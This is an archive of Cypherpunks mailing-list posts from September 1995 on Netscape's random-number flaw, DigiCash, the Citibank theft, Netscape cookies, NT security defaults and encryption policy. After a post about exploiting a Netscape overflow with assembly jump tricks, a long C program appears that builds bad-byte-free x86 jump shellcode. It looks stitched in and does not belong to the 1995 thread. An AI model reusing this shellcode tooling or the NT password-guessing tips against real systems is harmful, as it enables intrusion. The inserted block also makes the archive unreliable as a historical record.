> free cyber-bucks you were so generous as to give me. Second, on the
> WWW-page where one downloads the software it does not seem to do a secure
> connection between my browser and your server (on netscape there is
> a small key in the lower-left hand corner that is supposed to show when
> one is securely connected to a secure server). So someone could sniff my
> password from the transaction when I GET the software. Also When I'm
> buying/selling things it would be smart for all parties involved to
> be using PGP, and I think you should stress this point more in your page.
> Otherwise this is another vulnerable point in your system IMHO.
Let's get this straight before spreading more of these vicious rumours
that can easily get misinterpreted.

DigiCash is an R&D company developing ecash. We license out our
technology to banks. We are running the trial, but only have limited
resources to do so. This may result in long waiting time for accounts
or no answer on a tech support mail. (We are of course trying to
prevent this).

In a real-money system, the password can of course not be sent out in
plain mail. Either it has to be transferred out-of-band (phone, paper)
or PGP'd. But that would require at least ten people answering the
phones, sending snailmail, etc. We do not have the resources to do so,
so we send out the password plain. A malicious hacker may snatch the
password and open the account for you and steal your cb$100. This,
however, is not related to the security of the transactions once you
open the account! The password is only for starting up the account.

And of course downloading on a secure server is not relevant. The
software is the same for everyone! It is just not put out for public
downloading because it would mean a hundred times more people asking
for tech support. It would be more secure if we used different
passwords for downloading and for opening the accounts but again, that
would give a LOT more problems.

PGP does not add any security in the payment system. Ecash is already
secure.

Feel free to ask us the questions before publicly posting. It will
prevent misunderstandings and libel lawsuits.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."
From jya at pipeline.com Wed Sep 27 05:35:34 1995
From: jya at pipeline.com (John Young)
Date: Wed, 27 Sep 95 05:35:34 PDT
Subject: FT on NsCPunxsters
Message-ID: <199509271235.IAA07479@pipe4.nyc.pipeline.com>

Financial Times, Sept 27, 1995

Cracks in the code

Peter Martin calls for an easing of US restrictions on the export of
encryption technology

Encryption used to be a subject of interest only to spies and
mathematicians. But the central role that the electronic transmission
of information is playing in commerce and society makes it now a
technology of enormous practical relevance.

Two recent stories out of many exemplify this trend. Citibank lost
$400,000, it is alleged, to a Russian hacker who managed to crack its
clients' passwords. The solution to this security problem: a new
generation of encrypted passwords that are much harder to crack.

And Netscape Navigator, the leading "browser" program for the
Internet's fast-growing World Wide Web, has been shown to have flaws in
its encryption routine. In theory at least, these make it possible for
outsiders to read encrypted data sent over the net -- such as credit
card numbers. Netscape acknowledges the problems and says it will have
fixes available by today.

Is this crucial technology vulnerable to determined attack by hackers
and fraudsters? Before considering the question, remember that the
introduction of any new technology highlights risks uncomplainingly
borne for years. The safety precautions demanded of the Channel tunnel
are one example, as compared with those required of traditional trains
or ferries.

Similarly, it is argued, people have been unhesitatingly using analogue
mobile phones, reading credit card details over the telephone, and
sending off faxes into the ether without any of the panic that now
surrounds the issue of Internet security.

The comparison is an instructive one, but not entirely fair.
What worries Internet users is not so much that a determined enemy
might target them for eavesdropping, or even that chance might put
their credit card details in the hands of a dishonest person. Instead,
they worry about the Internet's unstructured nature under which
messages are passed from computer to computer across the world until
they reach their final destination.

In principle, this would allow a criminal to leave a "sniffer" program
lurking, electronically, at one of the nodes, recognising credit card
numbers as they passed by, and scooping them up for subsequent
exploitation. People also fear an attack on the computers of merchants
selling goods over the Internet -- each containing thousands of credit
card numbers. The fear is thus not one of random theft but of
systematic brigandage.

Encryption is all that stops such fears paralysing electronic commerce
before it has properly begun. It is therefore in the general public
interest that effective encryption be widely available.

The Netscape problem illustrates how easy it is for the inherent
mathematical strengths of a modern encryption scheme to be overcome by
an oversight in its supporting plumbing. One of the faults in
Netscape's encryption, for example, stems from too predictable a method
of generating the random numbers needed to make the scheme work.

It also illustrates how, once a code-breaker's task is simplified by
such a weakness, today's powerful networks of cheap computers make it
quick to crack even the most sophisticated encryption schemes. The
narrower the range of numbers through which the cracker's computers
must sift in order to find a meaningful answer, the greater the
probability of breaking the code within a useful amount of time.

All the more reason, then, for non-Americans to view with dismay a US
policy which restricts the international distribution of the most
powerful forms of encryption.
For national security reasons, the US insists that the version of
Netscape sold outside North America must contain a weaker form of
encryption than that available to Americans and Canadians. The
international version is restricted to a 40-digit "key", while the
North American version uses 128 digits.

The longer the key, the greater the time and computing power required
for the code to be cracked. In principle, given enough computing power,
even a message encoded by a very long key could be cracked in time. In
practice, however, the task of cracking many millions of messages to
find one that is of interest makes messages secure as long as the key
has enough digits.

Amateur code-crackers claim to have broken the 40-digit version of the
Netscape encryption scheme. Their claim is hard to verify. But there is
no doubt of the weakness in the random-number generation procedure;
Netscape has verified it. This fault is common to both North American
and export versions of the program, so it does not result from the US
government restrictions on key length.

The occasion reminds us, however, that effective encryption is
essential to the growth of electronic commerce. And it teaches us that
simplifying the code-breaker's task -- by error in Netscape's case, by
deliberate diktat in the case of the government restriction -- is an
easy way to make transmissions vulnerable. There was never much
justification for the US determination to weaken exported encryption
products. There is less now.

[End]

---------

NYT, Sept 27, 1995

Russians Arrest 6 In Computer Thefts

St. Petersburg, Russia, Sept 26 (AP) -- Russian police officers have
arrested six more people in a $10 million computer theft from Citibank
here, but the masterminds are said to remain at large.

An officer in the organized crime division was quoted by the Itar-Tass
news agency as saying that six people had been arrested in St.
Petersburg on swindling charges stemming from the case involving
Citibank, the chief unit of Citicorp.
Weapons and tax-evasion charges may also be filed. The police
confiscated two computers and a number of computer diskettes, plus
weapons and cash from the suspects.

Bank and law-enforcement officials say a gang of thieves in St.
Petersburg broke into Citibank's electronic cash-management system
scores of times and transferred money into their own accounts. Several
people have been arrested abroad and face charges in the United States,
including Vladimir Levin, 28, reportedly the group's computer hacker.

Citibank officials said they recovered all but $400,000 and upgraded
the cash-management system's electronic security after the theft.

[End]

---------

FT, Sept 21, 1995.

Extradition in Citibank hacking case

A British court yesterday approved the extradition to the US of Mr
Vladimir Levin, the Russian science graduate accused of an attempted
$10m (6.5m pounds) computer hacking fraud on Citibank.

...

Mr Levin has been charged in the UK with offences under the Computer
Misuse Act, forgery and false accounting. The US authorities are now
drawing up similar charges to bring against him.

Mr Levin is one of six people arrested over the alleged attempted fraud
on Citibank. An FBI inquiry into the incident is continuing and it is
believed that others are still being sought.

When Mr Levin is returned to the US, he is likely to be closely
questioned by the authorities, who are anxious to discover more of the
technical details of the alleged attempted fraud.

Mr Levin, who was arrested earlier this year travelling through
Stansted airport in the UK, would appeal against the court's decision,
his lawyers said. He has 14 days to lodge an appeal to the High Court
in London.

...

[End]

From jlasser at rwd.goucher.edu Wed Sep 27 06:25:00 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Wed, 27 Sep 95 06:25:00 PDT
Subject: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: 
Message-ID: 

On Tue, 26 Sep 1995, Timothy C. May wrote:

> At 6:52 PM 9/25/95, Jon Lasser wrote:
>
> >Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
> >a student like myself, and probably most others, if it's still anything
> >like it was at the 1.0 release) that most people have had zero opportunity
> >to examine the program, let alone really have time to play with it?
>
> I've never even _seen_ a copy of Notes running on any machine, nor do I
> know directly of _any_ of my colleagues who has. (Not saying nobody has, of
> course, just that I can't find anyone I know well who has.)

I've seen Notes running -- the Major-name discount software chain I used
to work for (peon level) used it for communications. It was slow and
frustrating, but my access to it was only marginal... I certainly hadn't
a chance to examine the code with a debugger, or even just play with it
some. But, knowing the software, it wouldn't surprise me if there were
some serious bugs in the security code.

> My point? Notes is nearly invisible in the non-corporate community I now
> hang out in.
>
> Who knows what weaknesses or bugs it has in it. Folks on our list probably
> don't have much familiarity with it.

Exactly... I think the product is guilty of security through obscurity,
though I'm not sure it's particularly intended, just merely an artifact
of the marketing strategy...

> My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM
> overpaid for Lotus, that the notion of Notes becoming the universal
> collaboration/communication option is flawed.

Agreed. OTOH, before the Web was known, it made a lot of sense for
corporations...

Jon

------------------------------------------------------------------------------
Jon Lasser (410)494-3072          Visit my home page at
                                  http://www.goucher.edu/~jlasser/
You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
From BRUEN at mitlns.mit.edu Wed Sep 27 06:32:06 1995
From: BRUEN at mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science)
Date: Wed, 27 Sep 95 06:32:06 PDT
Subject: Hegel
Message-ID: <950927093027.2000cf@mitlns.mit.edu>

James Caldwell wrote:

>On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote:

>It's called the Hegelian Diclectic(sp?) first postulated by William
>Hegel (an ass) in Germany approx the 1600's as a method for social change
>when none could otherwise be achieved.

Just for a reality check, Georg Wilhelm Hegel (1770-1831), was not an
ass, but rather a brilliant philosopher, even if you do like his views.
I am guessing you are referring to his "dialectic", which was simply an
observation of the way history worked:

        Thesis <---> Antithesis
                 |
             Synthesis

The synthesis then becomes the new thesis and history moves. It was not
proposed as a method of social change, but rather a description of how
history moves. It is always better to have some idea of what you are
talking about before you make such rash, critical statements.

Sorry for the noise to the list.

Bob

From rfb at lehman.com Wed Sep 27 06:36:36 1995
From: rfb at lehman.com (Rick Busdiecker)
Date: Wed, 27 Sep 95 06:36:36 PDT
Subject: [NOISE] Re: Easter Eggs
In-Reply-To: <199509261959.MAA28501@desiree.teleport.com>
Message-ID: <9509271335.AA26916@cfdevx1.lehman.com>

    Date: Tue, 26 Sep 1995 12:59:54 -0700
    From: Alan Olsen 

    You also need X windows to find the Mozilla animated icon hack on
    Jammie Zawinski's page.
    ^^^^^^

Just for the record, that's Jamie.

    obNetscapeHack: There is a feature called a "cookie file" in Netscape
    that is ripe for exploitation as a security leak. If you are using a
    Netscape server (and you may not even need that), you can feed all
    sorts of information into it without the user's knowledge. I have
    heard of one page that overloads the cookie file until the machine
    runs out of drive space. I am sure that there are other exploitable
    holes there... Any takers?

Yikes! That sounds really bad.
Do you have any more information on this? For example, can the server
write to anything other than $HOME/.netscape-cookies? If I write
protect that file, but it's still owned by me, will Netscape still
modify it?

--
Rick Busdiecker   Please do not send electronic junk mail!
net: rfb at lehman.com or rfb at cmu.edu   PGP Public Key: 0xDBD9994D
www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code. Breaking into systems is `cracking'.

From adam at homeport.org Wed Sep 27 07:00:11 1995
From: adam at homeport.org (Adam Shostack)
Date: Wed, 27 Sep 95 07:00:11 PDT
Subject: Security Update news release
In-Reply-To: <9509261733.AA22080@cantina.verity.com>
Message-ID: <199509271402.KAA23709@homeport.org>

| > > Here is the press release we put out this morning regarding the fix
| > > for RNG seed and stack overflow problems.
| >
| > Do the new versions use PGP's randseed.bin? If Netscape even only looks at
| > data used to keep PGP secure, Netscape will be banned from my computer
| > and every computer I am responsible for. -- For good.
|
| That doesn't quite make sense. Netscape reading randseed.bin can have no
| effect on the security of PGP.

I think you meant to say: "If md5 is a solid hash function, and if
Netscape doesn't dump core somewhere publicly readable, and if Netscape
doesn't accidentally have a stack overflow that causes your randseed.bin
to become confused with last-url-visited, then it is very unlikely that
Netscape reading your randseed.bin will have an effect on the security
of your PGP keys or messages."

The history of people doing the impossible is too long to not spell out
your security assumptions.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From dmandl at panix.com Wed Sep 27 07:27:40 1995
From: dmandl at panix.com (dmandl at panix.com)
Date: Wed, 27 Sep 95 07:27:40 PDT
Subject: PGP and FBI?
In-Reply-To: <199509270409.AAA00688@libws4.ic.sunysb.edu> Message-ID: On Wed, 27 Sep 1995, Deranged Mutant wrote: > There's some sort of documentary on WBAI 99.5 FM out of NYC now. > They're talking about PGP and right wing militias... the guy being > interviewed called PGP a "one time pad system" and doesn't understand > it... *sigh* Any more details on this? I know people who do shows on BAI. What was the date/time of the show? If this is true, it's pretty sad, especially since BAI's well known for being a "political" station. --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From ses at tipper.oit.unc.edu Wed Sep 27 07:38:02 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 27 Sep 95 07:38:02 PDT Subject: Using sound cards to accelerate RSA? Message-ID: Somebody mentioned the possibility of using the A/D stage of a sound card as a source of random bits, and that brought a thought back to mind: given that a lot of sound cards are now shipping with DSP chips on board, has anyone written any code that uses the card's DSP to accelerate RSA processing? Maybe there's a mass market for a crypto-blaster- an RNG, 3 or 6 DES chips, and a DSP. It would make for a killer linux based SHTTP server... Simon From mhw at wittsend.com Wed Sep 27 07:44:29 1995 From: mhw at wittsend.com (Michael H. Warfield) Date: Wed, 27 Sep 95 07:44:29 PDT Subject: Netscape for OS/2, when? (Re: Another Netscape Bug) In-Reply-To: <44a4kt$jda@tera.mcom.com> Message-ID: Jeff Weinstein enscribed thusly: > > In article <199509261223.JAA01800 at bud.peinet.pe.ca>, sentiono at cycor.ca (Sentiono Leowinata) writes: > > On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote: > > > > >> It's not an exploit script, but you can find an auto crash "animation" > > >> for Ray's discovered bug on > > >> http://hplyot.obspm.fr/~dl/netscapesec/c1.html > > >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/) > > >Crashes the 16-bit Windows version 1.1N.
> > >DCF > > > > Same here. For more information (not Netscape related), Web Explorer > > 1.02 for OS/2 also crashes for the long URL. > > I wish Netscape will port it to OS/2 (already ask them, but no comment > > from Netscape). I don't try it on Netscape 1.1N as it doesn't run > > reliably under Win-OS/2 (10 min -> crash! ;) > > My understanding is that OS/2 is supposed to be windows compatible, > as in "better Windows than Windows". If our windows app doesn't run > on OS/2, then isn't it IBM's bug, not ours? > Well, I'll admit that the MTBF (Mean Time Between Failures) on OS/2 would seem to be a little bit worse than the MTBGPF (Mean Time Between General Protection Faults) on Windows, but not much. If I run Netscape continuously for more than 20 minutes or so, I'm almost certain to get a GPF. I've even got a few tricks which can do it immediately. When it first comes up, Maximize the window, then hit stop, then hit another link, all before the Netscape Home Page is fully loaded. Bang! "The application Netscape has caused a General Protection Fault in module...." I've learned to let the dust settle before touching too much. BTW - This is true in 1.1N (16 bits) as well as 1.2N (32 bits) and even occurs in the "purchased" browser (the office bought a copy). Has been experienced on a half dozen machines or so, 386, 486, and Pentium, with differing video drivers. I also occasionally experience a segmentation violation and core dump while using Netscape 1.1N on Solaris. Not very frequently, maybe once every week or so, and I use UNIX A LOT MORE than Windows, so stability is actually even better. A GPF on Windows is roughly equivalent to a segmentation violation under UNIX since they both involve a pointer misuse resulting in an illegal memory reference.
Main real difference is that a GPF on UNIX rarely takes out the operating system while under Windows a GPF is a general indication that something has committed random acts of terrorism and Windows itself may be compromised. > --Jeff > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. -- Michael H. Warfield | (770) 985-6132 | mhw at WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From asgaard at sos.sll.se Wed Sep 27 07:45:58 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Wed, 27 Sep 95 07:45:58 PDT Subject: NO weak links in DigiCash system!!! In-Reply-To: <199509271227.NAA14451@digicash.com> Message-ID: DigiCash's BigMac wrote: > Feel free to ask us the questions before publicly posting. It will > prevent misunderstandings and libel lawsuits. Libel lawsuits for misunderstandings? Ridiculous. Libel threats are very rare on the CP list, it's one of the list's features. (I can't recollect any such threat since a well-known Nym was intimidated by LD, more than a year ago - and that Nym eventually saw the light.) Go sue yourself. Mats From mark at unicorn.com Wed Sep 27 07:57:21 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Wed, 27 Sep 95 07:57:21 PDT Subject: Status of Netscape Bug Exploit (suggestions needed) Message-ID: Couldn't you either create the address in a register, and then do an indirect jump through the register, or push it onto the stack and do a ret ? You could do something like

    mov ecx, address + 01010101
    sub ecx, 01010101
    jmp [ecx]

I'm not certain of the format for BSDI assembler, but I presume that's possible. You could modify the value you add and subtract to make sure there are no netscape-invalid bytes in the compiled code.
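The add-then-subtract trick Mark describes above, as an added worked example that is not part of his post or of any exploit from the thread: given a target address that contains bytes the delivery path would mangle, search for a delta such that both the delta and the sum encode cleanly, emit the 32-bit x86 sequence (mov ecx, imm32 / sub ecx, imm32 / jmp ecx, the register form of the indirect jump through ecx), and then check the finished bytes as a whole, because the opcode bytes have to pass the same filter as the immediates. The bad-byte set, the target address and the helper names are constructed for this example; the real forbidden set for any given target has to be measured, not assumed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed bad-byte set for this example: bytes a URL-based delivery
 * path would terminate on or rewrite. Not Netscape's real set. */
static const uint8_t kBadBytes[] = { 0x00, 0x0a, 0x0d, 0x20, 0x25, 0x3f };

static bool byte_is_bad(uint8_t b)
{
    for (size_t i = 0; i < sizeof kBadBytes; i++)
        if (kBadBytes[i] == b)
            return true;
    return false;
}

/* True when every byte in buf[0..len) is outside the bad set. */
bool bytes_are_clean(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (byte_is_bad(buf[i]))
            return false;
    return true;
}

/* Little-endian bytes of a 32-bit immediate, as they appear in the encoding. */
static void put_le32(uint8_t *out, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

bool imm_is_clean(uint32_t v)
{
    uint8_t le[4];
    put_le32(le, v);
    return bytes_are_clean(le, sizeof le);
}

/* Find delta such that both delta and addr+delta (mod 2^32) encode without
 * bad bytes. Repeated-byte deltas (the 01010101 pattern from the post) are
 * tried first, then a bounded linear scan. */
bool find_clean_delta(uint32_t addr, uint32_t *delta_out)
{
    for (uint32_t b = 1; b < 256; b++) {
        uint32_t d = b * 0x01010101u;
        if (imm_is_clean(d) && imm_is_clean(addr + d)) {
            *delta_out = d;
            return true;
        }
    }
    for (uint32_t d = 1; d < 0x01000000u; d++) {
        if (imm_is_clean(d) && imm_is_clean(addr + d)) {
            *delta_out = d;
            return true;
        }
    }
    return false;
}

/* Emit  mov ecx, addr+delta ; sub ecx, delta ; jmp ecx  as 32-bit x86:
 *   B9 imm32      mov ecx, imm32
 *   81 E9 imm32   sub ecx, imm32
 *   FF E1         jmp ecx   (register-indirect jump through ecx)
 * Returns 13 on success, 0 if no clean delta exists or the finished
 * sequence still contains a bad byte (the opcodes are filtered too). */
size_t emit_reg_jump(uint32_t addr, uint8_t out[13])
{
    uint32_t delta;
    if (!find_clean_delta(addr, &delta))
        return 0;
    out[0] = 0xB9;                 put_le32(out + 1, addr + delta);
    out[5] = 0x81; out[6] = 0xE9;  put_le32(out + 7, delta);
    out[11] = 0xFF; out[12] = 0xE1;
    return bytes_are_clean(out, 13) ? 13 : 0;
}

/* Re-derive where the emitted code lands: what mov loads minus what sub
 * removes, wrapping mod 2^32 exactly as the CPU does. */
uint32_t decode_target(const uint8_t code[13])
{
    uint32_t loaded = 0, sub = 0;
    for (int i = 0; i < 4; i++) {
        loaded |= (uint32_t)code[1 + i] << (8 * i);
        sub    |= (uint32_t)code[7 + i] << (8 * i);
    }
    return loaded - sub;
}

int main(void)
{
    uint8_t code[13];
    uint32_t target = 0x08040d1fu;   /* constructed; 0x0d is in the bad set */
    size_t n = emit_reg_jump(target, code);
    for (size_t i = 0; i < n; i++)
        printf("%02x ", code[i]);
    printf("-> jumps to %08x\n", decode_target(code));
    return n ? 0 : 1;
}
```

Compile with any C99 compiler; the program prints the byte sequence and the address it decodes back to. The decode_target check is worth keeping in a real build: a wrong delta is silent until the jump lands somewhere else, and a bad byte in an opcode rather than an immediate is just as fatal as one in the address.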
Mark From tjic at OpenMarket.com Wed Sep 27 08:21:38 1995 From: tjic at OpenMarket.com (Travis Corcoran) Date: Wed, 27 Sep 95 08:21:38 PDT Subject: [ PROPOSED NEW STANDARD ] "I-like-encrypted-mail" tag Message-ID: <199509271521.LAA12800@cranmore.openmarket.com> Summary: This message tosses out an idea for conveying within an { email | usenet } message the datum "the author of this message prefers to receive PGP encrypted communications" in a standard machine-readable form. Motivation: In the most recent version of my mail-secure.el package I included a feature that allows users to maintain a list of correspondents who prefer to receive encrypted mail. This list is then used by the package at email-send-time to see if a piece of email should be encrypted. I and others on this list include tags along the lines of "PGP encrypted mail preferred" in our .sigs. It occurred to me that this could be automated: (1) a standard "I-like-encrypted-mail" tag could be defined (2) cryptography-capable mail tools could scan incoming messages for this tag and add the originators of any message containing the tag to a list (3) cryptography-capable mail tools could then use this list when sending (as mail-secure.el currently does). Possible Implementations: A couple of different methods occur to me to implement step #1: (a) a new header could be defined and added to messages (as per section 3 of RFC 1505 ), along the lines of X-Rcv-Security-Prefered: PGP-Encryption (b) a certain keyword or phrase could be defined that could be inserted in the .sig block of a message. Ex: -- foo at bar.com PGP-Encrypted-Mail-Preferred I am tempted to suggest something either compatible with or in the spirit of SHTTP negotiation blocks, but restrain myself from doing so because this (a) seems needlessly baroque for the information being conveyed (b) falsely implies that a negotiation is taking place, when in fact a mere advisory is being issued.
Security concerns: A temporary denial-of-service/annoyance attack could be mounted by an adversary who issues one forged message from individual A with the "PGP-encrypted-mail preferred tag" present, and then puts a fake key on a keyserver. Anyone who uses a tag-aware mail-reading package and sees this message would send future mail to individual A encrypted in a manner that didn't allow A to read it. Please mail or post any thoughts on this proposal. Thanks, TJIC From cme at acm.org Wed Sep 27 08:23:32 1995 From: cme at acm.org (cme at acm.org) Date: Wed, 27 Sep 95 08:23:32 PDT Subject: The Fortezza random number generator is not trustworthy In-Reply-To: <199509262156.OAA21527@comsec.com> Message-ID: <9509271504.AA09830@tis.com> >Date: Tue, 26 Sep 1995 14:56:54 -0700 >From: Eric Blossom > >I was under the impression that a seed for the RNG is loaded into the >Fortezza at initialization time. This would make me think that they >are using a cryptographically strong PRNG. This would give data that >appears random, but is completely determined by the initial state. > >I suspect that the "seed keys" provided by the two agencies used to >program the Clipper chips has the same properties. This makes the >question about how does the NSA get access to the key escrow database >moot. They don't need access. They know a priori all the unit keys. My favorite Clipper master key generation algorithm, in the sacrificial laptop in the Mykotronix vault, is: \[ K(n) = H_1(R_1, R_2, n) = H_2( n ) \] where $H_2$ is a damned good one-way function, as highly classified as DERD's original description of the PRNG in the chip programming process indicated, $n$ is the chip's serial number, $R_1$ and $R_2$ are the random seeds provided by NIST and Treasury folks and $K(n)$ is the master key for chip n. - Carl +--------------------------------------------------------------------------+ |Carl M.
Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ From william at interval.net Wed Sep 27 08:51:43 1995 From: william at interval.net (William C. Archibald) Date: Wed, 27 Sep 95 08:51:43 PDT Subject: [NOISE] Re: Easter Eggs Message-ID: <9509271550.AA13262@entropy.interval.net> alano at teleport.com ]: > obNetscapeHack: There is a feature called a "cookie file" in > Netscape that is ripe for exploitation as a security leak. If you > are using a Netscape server (and you may not even need that), you > can feed all sorts of information into it without the user's > knowlege. I have heard of one page that overloads the cookie file > until the machine runs out of drive space. I am sure that there > are other exploitable holes there... Any takers? Umm. The spec says that there is a maximum cookie size and a maximum number of cookies that should be sent. I'll be the last to claim that Netscape created a 'standards-compliant' product, but they have at least recognized that these things aren't supposed to be infinitely large. rfb at lehman.com ]: > Yikes! That sounds really bad. Do you have any more information on > this? For example, can the server write to anything other than > $HOME/.netscape-cookies? If I write protect that file, but it's still > owned by me, will Netscape still modify it? The server can't write anything. Cookies are returned as HTTP response headers, which will either be: A) Ignored by a cookie-ignorant browser, or, B) Processed by a cookie-aware browser. In either case, the cookie cache reading/writing is done by the browser. If the browser is running as 'you' then it can access files that 'you' own. 
If you write protect it against yourself, then it's likely that your user-agent (Netscape) running as 'you' can't write to that file. Cheers! w. archibald = From ploshin at tiac.net Wed Sep 27 08:54:38 1995 From: ploshin at tiac.net (Pete Loshin) Date: Wed, 27 Sep 95 08:54:38 PDT Subject: "Notes" to be Eclipsed by "Netscape" Message-ID: <01BA8CD0.30988CA0@ploshin.tiac.net> Timothy C. May[SMTP:tcmay at got.net] wrote: >At 6:52 PM 9/25/95, Jon Lasser wrote: > >>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of >>a student like myself, and probably most others, if it's still anything >>like it was at the 1.0 release) that most people have had zero opportunity >>to examine the program, let alone really have time to play with it? > >I've never even _seen_ a copy of Notes running on any machine, nor do I >know directly of _any_ of my colleagues who has. (Not saying nobody has, of >course, just that I can't find anyone I know well who has.) I've used Notes myself (and have written about how it and Notes add-in apps are used). Yes, it was overpriced, but they came out with a less-featured, less-expensive version (which I haven't seen). Based on my experiences, it appears to be a choice for rigid/business management/TQM types in big corporations, among others. >I've been following the news on Notes for at least several years, even to >the point of buying some Lotus stock several years ago on the strength of >what I had read about Notes. (Alas, I sold it soon thereafter, before a >run-up in price.) > >My point? Notes is nearly invisible in the non-corporate community I now >hang out in. No question about that. You need a dedicated server, server software and, at least a year ago, it all cost something like $500+ per seat to setup. Plus, it doesn't do you any good unless you are working in a workgroup. >Who knows what weaknesses or bugs it has in it. Folks on our list probably >don't have much familiarity with it.
I only just subscribed to this list, and by all rights should probably spend more time lurking; that said, Notes includes encryption and digital signature. >My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM >overpaid for Lotus, that the notion of Notes becoming the universal >collaboration/communication option is flawed. There has been growing sentiment among certain sectors that workgroup computing is the wave of the future. Unfortunately, given IBM's track record, their purchase of Lotus seems to doom it to a fate similar to OS/2: an excellent product with a track record, with a small but fervent following, which will soon be eclipsed by some less-featured, newer product that makes someone a pot of money (like CollabraShare). Notes end users have always seemed to feel it had too much power and was not easy to figure out how to use; Notes programmers love it, and there are lots of add-ins. With Notes going to IBM, Netscape seems to have made another very clever move--while it still doesn't justify the overall stock price, it does justify the rise associated with that move. >(I've been saying for a while that the Web serves that purpose better, and >that Web browsers will likely edge out Notes. Apparently I was hardly >prescient, as Netscape recently bought Collabra, which is pushing that >point exactly.) Notes uses replication to distribute data across networks; there are better ways to have people compute remotely in my opinion too (not sure WWW is THE answer, but it certainly is one of them). >--Tim May -Pete Loshin peter at world.std.com From rrothenb at ic.sunysb.edu Wed Sep 27 08:55:24 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 27 Sep 95 08:55:24 PDT Subject: PGP and FBI? In-Reply-To: Message-ID: <199509271555.LAA14563@libws4.ic.sunysb.edu> > On Wed, 27 Sep 1995, Deranged Mutant wrote: > > > There's some sort of documentary on WBAI 99.5 FM out of NYC now. > > They're talking about PGP and right wing militias...
the guy being > > interviewed called PGP a "one time pad system" and doesn't understand > > it... *sigh* > > Any more details on this? I know people who do shows on BAI. What > was the date/time of the show? If this is true, it's pretty sad, > especially since BAI's well known for being a "political" station. I forget the name of the show, it was on Tues. night (last night) after Pacifica (around midnight)... I wrote and sent the message while I was hearing it. I stopped after bleating out the message and listened to some of the show, which was about right wing militias, Weaver case, Okla bomb, etc... turns out I missed the short part where the person being interviewed (duh, should've written his name down) mentioned PGP, which he also said stood for "Pretty Good Program". Wish I had more details of the show... (BTW, I'm temporarily off the c'punks list) Rob > > --Dave. > > -- > Dave Mandl > dmandl at panix.com > http://wfmu.org/~davem > From jamesd at echeque.com Wed Sep 27 09:04:10 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 27 Sep 95 09:04:10 PDT Subject: Hack Microsoft? Message-ID: <199509271603.JAA23248@blob.best.net> At 10:33 AM 9/26/95 EDT, Dan Bailey wrote: >>For fun ways to hack NT, check out http://www.somar.com/security.html. >> Some of these are really laughable. You can use NT's LogonUser API >>call to repeatedly guess passwords until you hit it, since NT offers >>no way to limit number of login attempts. At 12:10 PM 9/26/95 -0400, RJ Harvey wrote: > I don't believe that's correct; under User Manager, select >the Account option under the Policies menu item; it lets you >select whether to lock-out the account after a given number >of invalid logon attempts, and to set the number. 
The main >problem here is that by default, I don't believe the 'lock out' >option is enabled Similarly there is an awful lot of other stuff that is left wide open by default, most notably important parts of the registry, in particular \HKEY_LOCAL_MACHINE\SOFTWARE Permissions on this are usually set to give every user write access, so that every user can install software. None of the installation programs reset their registry key to exclude write access by anyone other than the administrator or the person installing the program, as a result any user can muck with the environment of any program installed by any other user. As a result any user can force feed most programs strings which the program would ordinarily assume are internally generated, and can therefore be trusted. A low privilege user can muck with the internals of a program installed by a high privilege user. This of course is a bug in the installation programs, rather than a bug in the operating system, but it is an almost universal bug. (But before you Unix folk gloat, consider how few Unix programs *have* installation programs, also that Unix has no registry security problem because it has no registry.) --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From rsnyder at janet.advsys.com Wed Sep 27 09:16:36 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Wed, 27 Sep 95 09:16:36 PDT Subject: getting netscape to support the remailers In-Reply-To: <9509261951.AA01873@ch1d157nwk> Message-ID: <199509271614.MAA07080@mobster.cit.ge.com> andrew_loewenstern at il.us.swissbank.com said: > Netscape doesn't need to support remailers explicitly since Netscape > will be supporting Java.
